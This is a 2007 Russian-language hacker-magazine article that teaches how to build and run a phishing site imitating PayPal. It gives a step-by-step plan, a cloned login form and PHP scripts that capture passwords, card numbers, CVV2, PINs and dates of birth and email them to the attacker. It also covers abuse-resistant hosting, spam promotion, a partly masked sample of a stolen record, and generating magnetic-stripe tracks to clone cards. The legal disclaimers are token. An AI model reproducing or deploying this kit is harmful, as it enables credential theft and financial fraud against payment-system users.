Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #97, ЯНВАРЬ 2007 г.

Рисуем скамы

Стройков «R0id» Леонид

Хакер, номер #097, стр. 088

(r0id@mail.ru)

Атаки на банковские и платежные системы

В последнее время большинство банков и платежных систем переместило часть своей деятельности во всемирную паутину. Теперь тебе не нужно выходить из дома, чтобы купить пиццу или оформить банковский перевод, все можно сделать посредством онлайн-операций. Сеть и финансы сегодня так же неотделимы друг от друга, как водка и соленые огурцы. И вроде бы всем хорошо - банки получают новых клиентов, а клиенты получают новые возможности. Но вот незадача: с развитием интернет-банкинга многие кардхолдеры стали обнаруживать пропажи весьма приличных сумм со своих счетов. А как это происходит, я тебе сейчас расскажу.

Представь себе такую ситуацию: довольный америкос чекает свой банковский аккаунт и обнаруживает, что на его счету вместо $10k находится лишь $1k. Путем нехитрых математических вычислений амер подсчитывает, что со счета пропали $9k. Но тут появляется следующий вопрос: куда пропали $9k? Забегая вперед, скажу, что ответ на него ты найдешь в этой статье. Вот только хочу предупредить тебя об одном: вся информация предоставлена мной исключительно с целью ознакомления и не в коем случае не является руководством к действию. Что же, как сказал наш первый космонавт, поехали =)!

Немного теории

Прочитав первый абзац, ты, наверное, предположил, что сейчас я расскажу тебе о том, как незаметно слить базу с банковского ресурса. К счастью, этого делать нам не придется. Почему к счастью? Да потому, что есть проверенный и гораздо менее геморройный способ. Имя ему – «фишинг». Про фишеров, я думаю, ты слышал уже не раз. Суть их работы заключается в старой доброй социальной инженерии. Действительно, зачем пытаться сломать банковскую базу, когда пользователь сам тебе готов все отдать =)? Но времена фейковых писем и простых схем давно прошли. Сейчас уже не так-то легко заполучить желанную информацию. Юзеры стали умнее, а банковские и платежные системы - сложнее. Но и здесь есть поле для деятельности под названием «скаминг» (не путать со скимингом). Если объяснять в общих словах, то скамы - это фейковые (поддельные) сайты и системы авторизации, используемые для получения конфиденциальной информации пользователей. Проще говоря, задача взломщика сводится к созданию скама какого-либо популярного финансового ресурса с поддельной системой авторизации и к привлечению на него юзеров с этого самого ресурса. В результате хакер может получить неплохую базу аккаунтов, найти применение которой не составит труда :). Но для успешной реализации задуманного потребуется решить несколько вопросов. Ниже я набросал примерный план действий, которого следует придерживаться:

1. выбор ресурса, под который мы и будем писать скам;

2. создание самого скама;

3. установка скама;

4. «пиар» скама среди пользователей настоящего ресурса;

5. сбор полученных данных;

6. реализация добытой информации.

Как видишь, все не так уж и сложно, хотя на первых порах могут возникнуть некоторые проблемы. Но обо всем по порядку.

Хороший скам - залог успеха

Первое, чему следует уделить особое внимание, - это выбор ресурса, под который рисуется скам. Подумай сам, зачем пытаться получить информацию, которая будет никому не нужна? В качестве жертв обычно выбирают европейские или американские банки, предоставляющие услуги интернет-банкинга. В нашем случае я предлагаю остановить свой выбор на крупнейшей забугорной платежной системе - PayPal. Во-первых, число пользователей палки (так называют PayPal в узких кругах) перевалило за 100 миллионов, а во-вторых, эта платежка позволяет осуществлять множество онлайн-операций.

Так, с жертвой определились =). Приступаем ко второму пункту нашего плана - созданию скама. Здесь нужно обязательно помнить следующее: даже самый глупый юзер не поверит тебе, если ты упустишь хоть какую-нибудь деталь. Поэтому уважающие себя хакеры с точностью копируют дизайн с настоящего сайта. Официальный сайт PayPal - www.paypal.com. Обрати внимание на банеры, линки - одним словом, на все, что бросается в глаза и может смутить пользователя. Далее копируй внешний дизайн ресурса. В случае если ты знаком с HTML и JavaScript, проблем возникнуть не должно. После создания шаблона скама необходимо приступить к написанию движка. Первый весьма важный момент - подмена адресной строки в браузере пользователя. То есть, заходя, к примеру, по адресу http://127.0.0.1, юзер будет видеть в адресной строке своего браузера привычный урл http://www.paypal.com. Красиво? Вот и я о том же. Реализуется эта фишка при помощи JavaScript. Я сознательно не буду приводить в статье код, так как он достаточно объемный. Замечу лишь одно - следует учитывать отображение адресной строки в каждом типе браузеров. Далее нужно определиться с требованиями к движку скама. Коротко я расписал их таким образом:

1. получение данных из формы авторизации;

2. просьба подтверждения профиля пользователя;

3. запись и сохранение полученных данных, включая IP и дату посещения юзера;

4. редирект пользователя на официальный сайт палки.

Кодить будем на PHP, так как он вполне способен удовлетворить наши запросы. С получением данных из формы авторизации, думаю, все ясно. Вид html-формочки логина выглядит так (кусок login-submit.html):

<FORM method=POST action="protect.php">

....

<td align="right" class="pplabelerror"><label for="login_email">Email Address:</label></td>

<td><br class="field_spacer"></td>

<td><input type="text" name="login_email" id="login_email" value="" size="20"></TD>

</tr>

<tr>

<td align="right" class="pplabelerror"><label for="login_password">Password:</label></td>

<td><br class="field_spacer"></td>

<td><input type="password" name="login_password" id="login_password" size=20 maxlength=40>

<A href="https://www.paypal.com/cgi-bin/webscr?cmd=_forgot-password" class="ppsmalltext">Forget your password?</a></td>

</tr>

Значения полей login_email и login_password мы отправляем на скрипт protect.php, который сохраняет полученный данные.

<?

$message .= "Login: ".$login_email."n";

$message .= "Password: ".$login_password."n";

?>

А затем он предлагает юзеру указать информацию своего аккаунта, после чего все данные улетают на update.php. Этот скрипт формирует тело письма и отсылает мессагу с данными аккаунта нам на мыло:

<?

$ip = getenv("REMOTE_ADDR");

$adddate=date("D M d, Y g:i a");

$message = "Date: ".$adddate."n";

$message .= "IP: ".$ip."n";

$message .= "nnn";

$message .= "Login: ".$login."n";

$message .= "Password: ".$password."n";

$message .= "CardType: ".$cardtype."n";

$message .= "CC Number: ".$ccnum."n";

$message .= "Expiration Month: ".$ccmonth." - ".$ccyear."n";

$message .= "CVV2: ".$cvv2."n";

$message .= "PIN: ".$pin."n";

$message .= "Phone: ".$phone."n";

$message .= "dob_year: ".$dob_year."n";

if (empty($fname) || empty($lname) || empty($address) || empty($city) || empty($state) || empty($zip) || empty($cardtype) || empty($ccnum) || empty($ccmonth) || empty($ccyear) || empty($cvv2) || empty($pin) ){

header("Location: Processing.htm");

}else {

mail("your_mail@mail.com", "info", $message);

mail("$cc", "eshat", $message);

};

?>

После того как мыло уходит, письмо юзера редиректит на официальный сайт PayPal'а, и он, ничего не подозревая, может продолжать пользоваться своим аккаунтом =). Полностью рабочий скам вместе с движком ты найдешь на диске к журналу. Теперь переходим к следующему шагу, а именно - к установке скама. С одной стороны, казалось бы, ничего сложного нет, но на самом деле здесь есть свои трудности. В первую очередь нужно найти хостинг, причем абузоустойчивый, иначе твой скам простоит не дольше суток. Если у тебя есть знакомые, имеющие собственный абузный дедик, то можешь попробовать договориться с ними работать под процент взамен на предоставление тебе хостинга на их сервере.

Далее нам необходимо «разрекламировать» наш скам. Проще всего сделать это при помощи спама по амерским базам. Так как каждый десятый америкос пользуется палкой, то отклик должен быть нехилый. О спаме я уже писал в ноябрьском номере «Хакера», так что все инструкции бери оттуда.

Сбор урожая

Ну, вот мы и подошли к самому приятному моменту - сбору урожая. Надо сказать, что за неделю функционирования скама на мыльнике хакера должен был скопиться не один десяток акков (при хорошем трафике, само собой). Полученные акки - перед глазами, но, кроме логина и пасса к палке, заметно еще несколько записей. Чтобы потом не возникало лишних вопросов, давай разберемся, что к чему =). В качестве примера рассмотрим одну из мессаг, отосланных со скама:

Date: Sun Sep 30, 2006 4:10 am

IP: 70.154.***.**

Login: ******@bellsouth.net

...

CC Number: 55815880********

Expiration Month: 06 - 2008

CVV2: 9**

PIN: 88**

Phone: 3363******

dob_day: 8

dob_year: 952

С такими полями, как Date, IP, First/Last name, Address, City, State, Country, ZIP, Phone, думаю, все понятно. Далее идут CardType - тип кредитки (в данном случае дебетка); CC Number - номер картонки; Expiration Month - дата окончания срока действия карты; CVV2 - защитный код CVV; PIN - пин-код к карточке; mmn - mother name; ssn - номер страховки (ssn); dob - date of birth (дата рождения). Как видишь, кроме самого аккаунта, мы получили еще и инфу о картонке плюс mmn, ssn, dob и pin. Такая информация всегда востребована, поэтому кардер без труда сможет продать ее, заработав неплохую прибавку к стипендии :). Особое внимание хочу уделить пин-коду. На первый взгляд может показаться, что толку от него нет, ведь никто не имеет дампов треков. В случае с MasterCard есть возможность сгенерить второй трек под отдельно взятую картонку. В Сети есть сервисы, осуществляющие такую работу, цена одной генерации - около $50. Получив второй трек, можно смело закатать его магнитную полосу. А далее – подсудное дело :).

Напоследок

Напоследок оставлю пару замечаний. Во-первых, как ты понимаешь, PayPal - достаточно крупная контора, и при желании найти и наказать тебя ей не составит труда, а во-вторых, палка уже доступна в России, а значит и сотрудничество с нашими правоохранительными органами тоже налажено. Поэтому, если у тебя нет желания ночевать в заведении под названием «СИЗО», восприми эту информацию только как ознакомительную. А иначе можешь начинать сушить сухари - за тобой придут =).

DVD

На DVD-диске ты найдешь готовый скам PayPal.

Danger

Внимание! Все действия взломщика противозаконны! Информация предоставлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!

Info

Никогда не пытайся украсть деньги с чужого счета. Рано или поздно тебя найдут.

Содержание
ttfb: 4.6069622039795 ms